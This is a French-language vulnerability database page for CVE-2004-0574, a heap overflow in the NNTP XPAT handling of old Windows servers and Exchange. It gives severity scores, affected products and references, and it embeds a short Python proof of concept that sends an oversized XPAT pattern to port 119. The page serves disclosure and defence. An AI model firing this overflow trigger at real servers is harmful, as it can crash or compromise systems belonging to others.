CVE-2004-0574 : Détail

CVE-2004-0574

Overflow
91.98%V3
Network
2004-10-16
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-787 Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 578

Date de publication : 2004-10-15 22h00 +00:00
Auteur : Lucas Lavarello
EDB Vérifié : Yes

#-- # IIS NNTP Service XPAT command heap overflow proof of concept # # Author: # Lucas Lavarello (lucas at coresecurity dot com) # Juliano Rizzo (juliano at coresecurity dot com) # # Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc. # All rights reserved. # # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF # THIS SOFTWARE # # www coresecurity com #-- from socket import * host = "127.0.0.1" pat = "C"*1946 + " " + "X"*10 newsgroup = "control.newgroup" sock = socket(AF_INET, SOCK_STREAM) sock.connect((host, 119)) print sock.recv(512) sock.send("group %s\x0d\x0a" % newsgroup) print sock.recv(512) sock.send("xpat From 1-9 %s \x0d\x0a" % pat) # milw0rm.com [2004-10-16]

Products Mentioned

Configuraton 0

Microsoft>>Exchange_server >> Version 2000

Microsoft>>Exchange_server >> Version 2003

Configuraton 0

Microsoft>>Windows_2000 >> Version -

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_server_2003 >> Version r2

Références

http://marc.info/?l=bugtraq&m=109761632831563&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/p-012.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.kb.cert.org/vuls/id/203126
Tags : third-party-advisory, x_refsource_CERT-VN